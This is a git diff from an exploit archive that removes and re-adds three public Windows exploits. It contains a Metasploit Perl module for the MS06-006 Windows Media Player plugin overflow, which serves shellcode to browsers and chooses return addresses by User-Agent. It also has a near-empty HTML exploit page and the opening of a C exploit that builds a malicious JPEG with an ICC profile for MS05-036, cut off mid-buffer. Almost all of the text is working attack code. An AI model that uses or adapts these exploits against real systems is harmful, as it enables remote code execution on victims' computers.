"\r\n$chunk\r\n"; - } - $chunked .= "0\r\n\r\n"; - - return $chunked; -} - -sub Gzip { - my $self = shift; - my $data = shift; - my $comp = int(rand(5))+5; - - my($wtr, $rdr, $err); - - my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); - print $wtr $data; - close ($wtr); - local $/; - - return (<$rdr>); -} - -1; - -# milw0rm.com [2006-02-17] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::wmp_plugin_ms06_006; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket::INET; +use IPC::Open3; + + my $advanced = + { + 'Gzip' => [1, 'Enable gzip content encoding'], + 'Chunked' => [1, 'Enable chunked transfer encoding'], + }; + +my $info = + { + 'Name' => 'Windows Media Player Plugin MS06-006 Overflow', + 'Version' => '$Revision: 1.1 $', + 'Authors' => + [ + 'H D Moore + Pex::Text::Freeform(qq{ + This module exploits a vulnerability in the Windows Media Player plugin + for non-Microsoft web browsers. This module has been tested with Windows + Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0 + (Firefox 1.5 and Opera 8.5). +}), + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winxp', 'win2003' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' }, + 'UserOpts' => + { + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + 'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ], + }, + + 'Payload' => + { + # give some stack space, align esp + 'Space' => 1024, + 'BadChars' => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 
0xff)),
+ 'MinNops' => 0,
+ 'MaxNops' => 0,
+ },
+ 'Refs' =>
+ [
+ ['CVE', '2006-0005'],
+ ['OSVDB', '23132'],
+ ['MSB', 'MS06-006'],
+ ['BID', '15130'],
+ ],
+
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ [ 'Automatic - WMP 9.0', 0x07694b1e ]
+ ],
+
+ 'Keys' => [ 'wmp' ],
+
+ 'DisclosureDate' => 'Feb 14 2006',
+ };
+
+sub new {
+ my $class = shift;
+ my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+ return($self);
+}
+
+sub Exploit
+{
+ my $self = shift;
+ my $server = IO::Socket::INET->new(
+ LocalHost => $self->GetVar('HTTPHOST'),
+ LocalPort => $self->GetVar('HTTPPORT'),
+ ReuseAddr => 1,
+ Listen => 1,
+ Proto => 'tcp'
+ );
+ my $client;
+
+ # Did the listener create fail?
+ if (not defined($server)) {
+ $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+ return;
+ }
+
+ my $httphost = $self->GetVar('HTTPHOST');
+ $httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
+
+ $self->PrintLine("[*] Waiting for connections to http://". $httphost .":".
$self->GetVar('HTTPPORT') ."/");
+
+ while (defined($client = $server->accept())) {
+ $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+ }
+
+ return;
+}
+
+sub HandleHttpClient
+{
+ my $self = shift;
+ my $fd = shift;
+
+ # Set the remote host information
+ my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+
+
+ # Read the HTTP command
+ my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
+ my $agent;
+
+ # Read in the HTTP headers
+ while ((my $line = $fd->RecvLine(10))) {
+
+ $line =~ s/^\s+|\s+$//g;
+
+ my ($var, $val) = split(/\:/, $line, 2);
+
+ # Break out if we reach the end of the headers
+ last if (not defined($var) or not defined($val));
+
+ $agent = $val if $var =~ /User-Agent/i;
+ }
+
+
+ my $addr;
+
+ ##
+ # XXX Does not detect Windows SP levels or WMP version :-(
+ ##
+
+ # Windows NT and Windows 2000 systems
+ if ($agent =~ /Windows NT [45]\.0/) {
+ $self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
+ $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
+ }
+
+ # Windows XP SP2
+ if ($agent =~ /Windows NT 5\.1/) {
+ $self->PrintLine("[*] Targetting WMP v9 on XP SP2...");
+ $addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
+ }
+
+ # Windows 2003 SP0
+ if ($agent =~ /Windows NT 5\.2/) {
+ $self->PrintLine("[*] Targetting WMP v9 on 2003 SP0...");
+ $addr = 0x585a6052; # wmp.dll v9.00.00.2991
+ }
+
+
+ my $target = $self->Targets->[$self->GetVar('TARGET')];
+ my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+ my $pattern = "C" x 4000;
+
+ $addr = $target->[1] if ! $addr;
+
+ # We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
+ # So we do it like a drunk ninja.
+ my $getpc =
+ "\x58\x58\x58". # pop eax, pop eax, pop eax
+ "\x05\x18\x29\x29\x29". # add eax,0x29292917
+ "\x2d\x01\x29\x29\x29".
# sub eax,0x29292901
+ "\x50\x59"; # push eax, pop ecx
+
+ substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
+ substr($pattern, 2086, 4, pack('V', $addr));
+ substr($pattern, 2090, length($getpc), $getpc);
+ substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
+
+ my $content = "";
+
+ $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
+
+ $fd->Send($self->BuildResponse($content));
+
+ # Prevents IE from throwing an error in some cases
+ select(undef, undef, undef, 0.1);
+
+ $fd->Close();
+}
+
+sub RandomHeaders {
+ my $self = shift;
+ my $head = '';
+
+ while (length($head) < 3072) {
+ $head .= "X-" .
+ Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
+ Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n";
+ }
+ return $head;
+}
+
+
+sub BuildResponse {
+ my ($self, $content) = @_;
+
+ my $response =
+ "HTTP/1.1 200 OK\r\n" .
+ $self->RandomHeaders() .
+ "Content-Type: text/html\r\n";
+
+ if ($self->GetVar('Gzip')) {
+ $response .= "Content-Encoding: gzip\r\n";
+ $content = $self->Gzip($content);
+ }
+ if ($self->GetVar('Chunked')) {
+ $response .= "Transfer-Encoding: chunked\r\n";
+ $content = $self->Chunk($content);
+ } else {
+ $response .= 'Content-Length: ' . length($content) . "\r\n" .
+ "Connection: close\r\n";
+ }
+
+ $response .= "\r\n" . $content;
+
+ return $response;
+}
+
+sub Chunk {
+ my ($self, $content) = @_;
+
+ my $chunked;
+ while (length($content)) {
+ my $chunk = substr($content, 0, int(rand(10) + 1), '');
+ $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+ }
+ $chunked .= "0\r\n\r\n";
+
+ return $chunked;
+}
+
+sub Gzip {
+ my $self = shift;
+ my $data = shift;
+ my $comp = int(rand(5))+5;
+
+ my($wtr, $rdr, $err);
+
+ my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+ print $wtr $data;
+ close ($wtr);
+ local $/;
+
+ return (<$rdr>);
+}
+
+1;
+
+# milw0rm.com [2006-02-17]
diff --git a/platforms/windows/remote/1505.html b/platforms/windows/remote/1505.html index 7445f19f3..2372a73eb 100755 --- a/platforms/windows/remote/1505.html +++ b/platforms/windows/remote/1505.html @@ -1,105 +1,105 @@ - - -WMP Plugin EMBED Exploit - - - - - - - -# milw0rm.com [2006-02-17] + + +WMP Plugin EMBED Exploit + + + + + + + +# milw0rm.com [2006-02-17] diff --git a/platforms/windows/remote/1506.c b/platforms/windows/remote/1506.c index 2c6d77a35..7e291c68c 100755 --- a/platforms/windows/remote/1506.c +++ b/platforms/windows/remote/1506.c 
@@ -1,489 +1,489 @@ -/* -\ MS05-036 ICC Stack Overflow Exploit -/ by Darkeagle -\ -/ GreetZ: all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, #black, redsand -\ -/ -\ special tnx to snooq for his PoC. -/ -\ -/ xploit was tested on WinXP SP1 RUS with explorer.exe -\ -/ 02.08.05 -\ -/ http://eagle.blacksecurity.org -\ -*/ - -#include -#include -#include - -#define TARGET 1 -#define NOP 0x90 -#define FNAME "eagl3.jpg" -#define BSIZE sizeof(buff)-1 -#define EIP_OFFSET 0x3A0 -#define SC_OFFSET 0x246 -#define NOP_OFFSET 0x218 -#define NOP_SIZE 0x112 - -#define tag_content_offset 0x23E // file buffer offset craft stuff -#define content_size_offset 0xE2 // tag content buffer size -#define no_access_violate 0x32E // avoid access violate -#define no_access_violate2 0x32E+12 // avoid access violate -#define stack_land_offset ret_addr_offset+16 // reture address offset -#define ret_addr_offset no_access_violate+8 // reture address offset - -/* -* Silly JPEG stuffed with ICC profile......... -*/ - -char buff[]= -"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x00\x01\x00\x60" -"\x00\x60\x00\x00\xFF\xE2\x0C\x58\x49\x43\x43\x5F\x50\x52\x4F\x46" -"\x49\x4C\x45\x00\x01\x01\x00\x00\x0C\x48\x4C\x69\x6E\x6F\x02\x10" -"\x00\x00\x6D\x6E\x74\x72\x52\x47\x42\x20\x58\x59\x5A\x20\x07\xCE" -"\x00\x02\x00\x09\x00\x06\x00\x31\x00\x00\x61\x63\x73\x70\x4D\x53" -"\x46\x54\x00\x00\x00\x00\x49\x45\x43\x20\x73\x52\x47\x42\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF6\xD6\x00\x01" -"\x00\x00\x00\x00\xD3\x2D\x48\x50\x20\x20\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x63\x70\x72\x74\x00\x00" -"\x01\x50\x00\x00\x00\x33\x64\x65\x73\x63\x00\x00\x01\x84\x00\x00" -"\x00\x6C\x77\x74\x70\x74\x00\x00\x01\xF0\x00\x00\x00\x14\x62\x6B" -"\x70\x74\x00\x00\x02\x04\x00\x00\x00\x14\x72\x58\x59\x5A\x00\x00" 
-"\x02\x18\x00\x00\x00\xFC\x67\x58\x59\x5A\x00\x00\x02\x2C\x00\x00" -"\x00\x14\x62\x58\x59\x5A\x00\x00\x02\x40\x00\x00\x00\x14\x64\x6D" -"\x6E\x64\x00\x00\x02\x54\x00\x00\x00\x70\x64\x6D\x64\x64\x00\x00" -"\x02\xC4\x00\x00\x00\x88\x76\x75\x65\x64\x00\x00\x03\x4C\x00\x00" -"\x00\x86\x76\x69\x65\x77\x00\x00\x03\xD4\x00\x00\x00\x24\x6C\x75" -"\x6D\x69\x00\x00\x03\xF8\x00\x00\x00\x14\x6D\x65\x61\x73\x00\x00" -"\x04\x0C\x00\x00\x00\x24\x74\x65\x63\x68\x00\x00\x04\x30\x00\x00" -"\x00\x0C\x72\x54\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x67\x54" -"\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x62\x54\x52\x43\x00\x00" -"\x04\x3C\x00\x00\x08\x0C\x74\x65\x78\x74\x00\x00\x00\x00\x43\x6F" -"\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x31\x39\x39\x38" -"\x20\x48\x65\x77\x6C\x65\x74\x74\x2D\x50\x61\x63\x6B\x61\x72\x64" -"\x20\x43\x6F\x6D\x70\x61\x6E\x79\x00\x00\x64\x65\x73\x63\x00\x00" -"\x00\x00\x00\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31" -"\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31\x39\x36\x36" -"\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00" -"\xF3\x51\x00\x01\x00\x00\x00\x01\x16\xCC\x58\x59\x5A\x20\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58\x59" -"\x5A\x20\x00\x00\x00\x00\x00\x00\x6F\xA2\x00\x00\x38\xF5\x00\x00" -"\x03\x90\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00\x62\x99\x00\x00" -"\xB7\x85\x00\x00\x18\xDA\x58\x59\x5A\x20\x00\x00\x00\x00\x00\x00" -"\x24\xA0\x00\x00\x0F\x84\x00\x00\xB6\xCF\x64\x65\x73\x63\x00\x00" -"\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A\x2F" -"\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x16\x49\x45\x43\x20\x68\x74\x74\x70\x3A" 
-"\x2F\x2F\x77\x77\x77\x2E\x69\x65\x63\x2E\x63\x68\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x65\x73\x63\x00\x00" -"\x00\x00\x00\x00\x00\x2E\x49\x45\x43\x20\x36\x31\x39\x36\x36\x2D" -"\x32\x2E\x31\x20\x44\x65\x66\x61\x75\x6C\x74\x20\x52\x47\x42\x20" -"\x63\x6F\x6C\x6F\x75\x72\x20\x73\x70\x61\x63\x65\x20\x2D\x20\x73" -"\x52\x47\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x04\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x65\x66" -"\x61\x75\x6C\x74\x20\x52\x47\x42\x20\x63\x6F\x6C\x6F\x75\x72\x20" -"\x73\x70\x61\x63\x65\x20\x2D\x20\x73\x52\x47\x42\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x64\x65\x73\x63\x00\x00\x00\x00\x00\x00\x00\x2C\x52\x65" -"\x66\x65\x72\x65\x6E\x63\x65\x20\x56\x69\x65\x77\x69\x6E\x67\x20" -"\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E\x20\x69\x6E\x20\x49\x45\x43" -"\x36\x31\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x2C\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x20\x56" -"\x69\x65\x77\x69\x6E\x67\x20\x43\x6F\x6E\x64\x69\x74\x69\x6F\x6E" -"\x20\x69\x6E\x20\x49\x45\x43\x36\x31\x39\x36\x36\x2D\x32\x2E\x31" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x65\x77\x00\x00" -"\x00\x00\x00\x13\xA4\xFE\x00\x14\x5F\x2E\x00\x10\xCF\x14\x00\x03" -"\xED\xCC\x00\x04\x13\x0B\x00\x03\x5C\x9E\x00\x00\x00\x01\x58\x59" -"\x5A\x20\x00\x00\x00\x00\x00\x4C\x09\x56\x00\x50\x00\x00\x00\x57" -"\x1F\xE7\x6D\x65\x61\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x02\x8F\x00\x00\x00\x02\x73\x69\x67\x20\x00\x00\x00\x00\x43\x52" -"\x54\x20\x63\x75\x72\x76\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00" -"\x00\x05\x00\x0A\x00\x0F\x00\x14\x00\x19\x00\x1E\x00\x23\x00\x28" 
-"\x00\x2D\x00\x32\x00\x37\x00\x3B\x00\x40\x00\x45\x00\x4A\x00\x4F" -"\x00\x54\x00\x59\x00\x5E\x00\x63\x00\x68\x00\x6D\x00\x72\x00\x77" -"\x00\x7C\x00\x81\x00\x86\x00\x8B\x00\x90\x00\x95\x00\x9A\x00\x9F" -"\x00\xA4\x00\xA9\x00\xAE\x00\xB2\x00\xB7\x00\xBC\x00\xC1\x00\xC6" -"\x00\xCB\x00\xD0\x00\xD5\x00\xDB\x00\xE0\x00\xE5\x00\xEB\x00\xF0" -"\x00\xF6\x00\xFB\x01\x01\x01\x07\x01\x0D\x01\x13\x01\x19\x01\x1F" -"\x01\x25\x01\x2B\x01\x32\x01\x38\x01\x3E\x01\x45\x01\x4C\x01\x52" -"\x01\x59\x01\x60\x01\x67\x01\x6E\x01\x75\x01\x7C\x01\x83\x01\x8B" -"\x01\x92\x01\x9A\x01\xA1\x01\xA9\x01\xB1\x01\xB9\x01\xC1\x01\xC9" -"\x01\xD1\x01\xD9\x01\xE1\x01\xE9\x01\xF2\x01\xFA\x02\x03\x02\x0C" -"\x02\x14\x02\x1D\x02\x26\x02\x2F\x02\x38\x02\x41\x02\x4B\x02\x54" -"\x02\x5D\x02\x67\x02\x71\x02\x7A\x02\x84\x02\x8E\x02\x98\x02\xA2" -"\x02\xAC\x02\xB6\x02\xC1\x02\xCB\x02\xD5\x02\xE0\x02\xEB\x02\xF5" -"\x03\x00\x03\x0B\x03\x16\x03\x21\x03\x2D\x03\x38\x03\x43\x03\x4F" -"\x03\x5A\x03\x66\x03\x72\x03\x7E\x03\x8A\x03\x96\x03\xA2\x03\xAE" -"\x03\xBA\x03\xC7\x03\xD3\x03\xE0\x03\xEC\x03\xF9\x04\x06\x04\x13" -"\x04\x20\x04\x2D\x04\x3B\x04\x48\x04\x55\x04\x63\x04\x71\x04\x7E" -"\x04\x8C\x04\x9A\x04\xA8\x04\xB6\x04\xC4\x04\xD3\x04\xE1\x04\xF0" -"\x04\xFE\x05\x0D\x05\x1C\x05\x2B\x05\x3A\x05\x49\x05\x58\x05\x67" -"\x05\x77\x05\x86\x05\x96\x05\xA6\x05\xB5\x05\xC5\x05\xD5\x05\xE5" -"\x05\xF6\x06\x06\x06\x16\x06\x27\x06\x37\x06\x48\x06\x59\x06\x6A" -"\x06\x7B\x06\x8C\x06\x9D\x06\xAF\x06\xC0\x06\xD1\x06\xE3\x06\xF5" -"\x07\x07\x07\x19\x07\x2B\x07\x3D\x07\x4F\x07\x61\x07\x74\x07\x86" -"\x07\x99\x07\xAC\x07\xBF\x07\xD2\x07\xE5\x07\xF8\x08\x0B\x08\x1F" -"\x08\x32\x08\x46\x08\x5A\x08\x6E\x08\x82\x08\x96\x08\xAA\x08\xBE" -"\x08\xD2\x08\xE7\x08\xFB\x09\x10\x09\x25\x09\x3A\x09\x4F\x09\x64" -"\x09\x79\x09\x8F\x09\xA4\x09\xBA\x09\xCF\x09\xE5\x09\xFB\x0A\x11" -"\x0A\x27\x0A\x3D\x0A\x54\x0A\x6A\x0A\x81\x0A\x98\x0A\xAE\x0A\xC5" -"\x0A\xDC\x0A\xF3\x0B\x0B\x0B\x22\x0B\x39\x0B\x51\x0B\x69\x0B\x80" 
-"\x0B\x98\x0B\xB0\x0B\xC8\x0B\xE1\x0B\xF9\x0C\x12\x0C\x2A\x0C\x43" -"\x0C\x5C\x0C\x75\x0C\x8E\x0C\xA7\x0C\xC0\x0C\xD9\x0C\xF3\x0D\x0D" -"\x0D\x26\x0D\x40\x0D\x5A\x0D\x74\x0D\x8E\x0D\xA9\x0D\xC3\x0D\xDE" -"\x0D\xF8\x0E\x13\x0E\x2E\x0E\x49\x0E\x64\x0E\x7F\x0E\x9B\x0E\xB6" -"\x0E\xD2\x0E\xEE\x0F\x09\x0F\x25\x0F\x41\x0F\x5E\x0F\x7A\x0F\x96" -"\x0F\xB3\x0F\xCF\x0F\xEC\x10\x09\x10\x26\x10\x43\x10\x61\x10\x7E" -"\x10\x9B\x10\xB9\x10\xD7\x10\xF5\x11\x13\x11\x31\x11\x4F\x11\x6D" -"\x11\x8C\x11\xAA\x11\xC9\x11\xE8\x12\x07\x12\x26\x12\x45\x12\x64" -"\x12\x84\x12\xA3\x12\xC3\x12\xE3\x13\x03\x13\x23\x13\x43\x13\x63" -"\x13\x83\x13\xA4\x13\xC5\x13\xE5\x14\x06\x14\x27\x14\x49\x14\x6A" -"\x14\x8B\x14\xAD\x14\xCE\x14\xF0\x15\x12\x15\x34\x15\x56\x15\x78" -"\x15\x9B\x15\xBD\x15\xE0\x16\x03\x16\x26\x16\x49\x16\x6C\x16\x8F" -"\x16\xB2\x16\xD6\x16\xFA\x17\x1D\x17\x41\x17\x65\x17\x89\x17\xAE" -"\x17\xD2\x17\xF7\x18\x1B\x18\x40\x18\x65\x18\x8A\x18\xAF\x18\xD5" -"\x18\xFA\x19\x20\x19\x45\x19\x6B\x19\x91\x19\xB7\x19\xDD\x1A\x04" -"\x1A\x2A\x1A\x51\x1A\x77\x1A\x9E\x1A\xC5\x1A\xEC\x1B\x14\x1B\x3B" -"\x1B\x63\x1B\x8A\x1B\xB2\x1B\xDA\x1C\x02\x1C\x2A\x1C\x52\x1C\x7B" -"\x1C\xA3\x1C\xCC\x1C\xF5\x1D\x1E\x1D\x47\x1D\x70\x1D\x99\x1D\xC3" -"\x1D\xEC\x1E\x16\x1E\x40\x1E\x6A\x1E\x94\x1E\xBE\x1E\xE9\x1F\x13" -"\x1F\x3E\x1F\x69\x1F\x94\x1F\xBF\x1F\xEA\x20\x15\x20\x41\x20\x6C" -"\x20\x98\x20\xC4\x20\xF0\x21\x1C\x21\x48\x21\x75\x21\xA1\x21\xCE" -"\x21\xFB\x22\x27\x22\x55\x22\x82\x22\xAF\x22\xDD\x23\x0A\x23\x38" -"\x23\x66\x23\x94\x23\xC2\x23\xF0\x24\x1F\x24\x4D\x24\x7C\x24\xAB" -"\x24\xDA\x25\x09\x25\x38\x25\x68\x25\x97\x25\xC7\x25\xF7\x26\x27" -"\x26\x57\x26\x87\x26\xB7\x26\xE8\x27\x18\x27\x49\x27\x7A\x27\xAB" -"\x27\xDC\x28\x0D\x28\x3F\x28\x71\x28\xA2\x28\xD4\x29\x06\x29\x38" -"\x29\x6B\x29\x9D\x29\xD0\x2A\x02\x2A\x35\x2A\x68\x2A\x9B\x2A\xCF" -"\x2B\x02\x2B\x36\x2B\x69\x2B\x9D\x2B\xD1\x2C\x05\x2C\x39\x2C\x6E" -"\x2C\xA2\x2C\xD7\x2D\x0C\x2D\x41\x2D\x76\x2D\xAB\x2D\xE1\x2E\x16" 
-"\x2E\x4C\x2E\x82\x2E\xB7\x2E\xEE\x2F\x24\x2F\x5A\x2F\x91\x2F\xC7" -"\x2F\xFE\x30\x35\x30\x6C\x30\xA4\x30\xDB\x31\x12\x31\x4A\x31\x82" -"\x31\xBA\x31\xF2\x32\x2A\x32\x63\x32\x9B\x32\xD4\x33\x0D\x33\x46" -"\x33\x7F\x33\xB8\x33\xF1\x34\x2B\x34\x65\x34\x9E\x34\xD8\x35\x13" -"\x35\x4D\x35\x87\x35\xC2\x35\xFD\x36\x37\x36\x72\x36\xAE\x36\xE9" -"\x37\x24\x37\x60\x37\x9C\x37\xD7\x38\x14\x38\x50\x38\x8C\x38\xC8" -"\x39\x05\x39\x42\x39\x7F\x39\xBC\x39\xF9\x3A\x36\x3A\x74\x3A\xB2" -"\x3A\xEF\x3B\x2D\x3B\x6B\x3B\xAA\x3B\xE8\x3C\x27\x3C\x65\x3C\xA4" -"\x3C\xE3\x3D\x22\x3D\x61\x3D\xA1\x3D\xE0\x3E\x20\x3E\x60\x3E\xA0" -"\x3E\xE0\x3F\x21\x3F\x61\x3F\xA2\x3F\xE2\x40\x23\x40\x64\x40\xA6" -"\x40\xE7\x41\x29\x41\x6A\x41\xAC\x41\xEE\x42\x30\x42\x72\x42\xB5" -"\x42\xF7\x43\x3A\x43\x7D\x43\xC0\x44\x03\x44\x47\x44\x8A\x44\xCE" -"\x45\x12\x45\x55\x45\x9A\x45\xDE\x46\x22\x46\x67\x46\xAB\x46\xF0" -"\x47\x35\x47\x7B\x47\xC0\x48\x05\x48\x4B\x48\x91\x48\xD7\x49\x1D" -"\x49\x63\x49\xA9\x49\xF0\x4A\x37\x4A\x7D\x4A\xC4\x4B\x0C\x4B\x53" -"\x4B\x9A\x4B\xE2\x4C\x2A\x4C\x72\x4C\xBA\x4D\x02\x4D\x4A\x4D\x93" -"\x4D\xDC\x4E\x25\x4E\x6E\x4E\xB7\x4F\x00\x4F\x49\x4F\x93\x4F\xDD" -"\x50\x27\x50\x71\x50\xBB\x51\x06\x51\x50\x51\x9B\x51\xE6\x52\x31" -"\x52\x7C\x52\xC7\x53\x13\x53\x5F\x53\xAA\x53\xF6\x54\x42\x54\x8F" -"\x54\xDB\x55\x28\x55\x75\x55\xC2\x56\x0F\x56\x5C\x56\xA9\x56\xF7" -"\x57\x44\x57\x92\x57\xE0\x58\x2F\x58\x7D\x58\xCB\x59\x1A\x59\x69" -"\x59\xB8\x5A\x07\x5A\x56\x5A\xA6\x5A\xF5\x5B\x45\x5B\x95\x5B\xE5" -"\x5C\x35\x5C\x86\x5C\xD6\x5D\x27\x5D\x78\x5D\xC9\x5E\x1A\x5E\x6C" -"\x5E\xBD\x5F\x0F\x5F\x61\x5F\xB3\x60\x05\x60\x57\x60\xAA\x60\xFC" -"\x61\x4F\x61\xA2\x61\xF5\x62\x49\x62\x9C\x62\xF0\x63\x43\x63\x97" -"\x63\xEB\x64\x40\x64\x94\x64\xE9\x65\x3D\x65\x92\x65\xE7\x66\x3D" -"\x66\x92\x66\xE8\x67\x3D\x67\x93\x67\xE9\x68\x3F\x68\x96\x68\xEC" -"\x69\x43\x69\x9A\x69\xF1\x6A\x48\x6A\x9F\x6A\xF7\x6B\x4F\x6B\xA7" -"\x6B\xFF\x6C\x57\x6C\xAF\x6D\x08\x6D\x60\x6D\xB9\x6E\x12\x6E\x6B" 
-"\x6E\xC4\x6F\x1E\x6F\x78\x6F\xD1\x70\x2B\x70\x86\x70\xE0\x71\x3A" -"\x71\x95\x71\xF0\x72\x4B\x72\xA6\x73\x01\x73\x5D\x73\xB8\x74\x14" -"\x74\x70\x74\xCC\x75\x28\x75\x85\x75\xE1\x76\x3E\x76\x9B\x76\xF8" -"\x77\x56\x77\xB3\x78\x11\x78\x6E\x78\xCC\x79\x2A\x79\x89\x79\xE7" -"\x7A\x46\x7A\xA5\x7B\x04\x7B\x63\x7B\xC2\x7C\x21\x7C\x81\x7C\xE1" -"\x7D\x41\x7D\xA1\x7E\x01\x7E\x62\x7E\xC2\x7F\x23\x7F\x84\x7F\xE5" -"\x80\x47\x80\xA8\x81\x0A\x81\x6B\x81\xCD\x82\x30\x82\x92\x82\xF4" -"\x83\x57\x83\xBA\x84\x1D\x84\x80\x84\xE3\x85\x47\x85\xAB\x86\x0E" -"\x86\x72\x86\xD7\x87\x3B\x87\x9F\x88\x04\x88\x69\x88\xCE\x89\x33" -"\x89\x99\x89\xFE\x8A\x64\x8A\xCA\x8B\x30\x8B\x96\x8B\xFC\x8C\x63" -"\x8C\xCA\x8D\x31\x8D\x98\x8D\xFF\x8E\x66\x8E\xCE\x8F\x36\x8F\x9E" -"\x90\x06\x90\x6E\x90\xD6\x91\x3F\x91\xA8\x92\x11\x92\x7A\x92\xE3" -"\x93\x4D\x93\xB6\x94\x20\x94\x8A\x94\xF4\x95\x5F\x95\xC9\x96\x34" -"\x96\x9F\x97\x0A\x97\x75\x97\xE0\x98\x4C\x98\xB8\x99\x24\x99\x90" -"\x99\xFC\x9A\x68\x9A\xD5\x9B\x42\x9B\xAF\x9C\x1C\x9C\x89\x9C\xF7" -"\x9D\x64\x9D\xD2\x9E\x40\x9E\xAE\x9F\x1D\x9F\x8B\x9F\xFA\xA0\x69" -"\xA0\xD8\xA1\x47\xA1\xB6\xA2\x26\xA2\x96\xA3\x06\xA3\x76\xA3\xE6" -"\xA4\x56\xA4\xC7\xA5\x38\xA5\xA9\xA6\x1A\xA6\x8B\xA6\xFD\xA7\x6E" -"\xA7\xE0\xA8\x52\xA8\xC4\xA9\x37\xA9\xA9\xAA\x1C\xAA\x8F\xAB\x02" -"\xAB\x75\xAB\xE9\xAC\x5C\xAC\xD0\xAD\x44\xAD\xB8\xAE\x2D\xAE\xA1" -"\xAF\x16\xAF\x8B\xB0\x00\xB0\x75\xB0\xEA\xB1\x60\xB1\xD6\xB2\x4B" -"\xB2\xC2\xB3\x38\xB3\xAE\xB4\x25\xB4\x9C\xB5\x13\xB5\x8A\xB6\x01" -"\xB6\x79\xB6\xF0\xB7\x68\xB7\xE0\xB8\x59\xB8\xD1\xB9\x4A\xB9\xC2" -"\xBA\x3B\xBA\xB5\xBB\x2E\xBB\xA7\xBC\x21\xBC\x9B\xBD\x15\xBD\x8F" -"\xBE\x0A\xBE\x84\xBE\xFF\xBF\x7A\xBF\xF5\xC0\x70\xC0\xEC\xC1\x67" 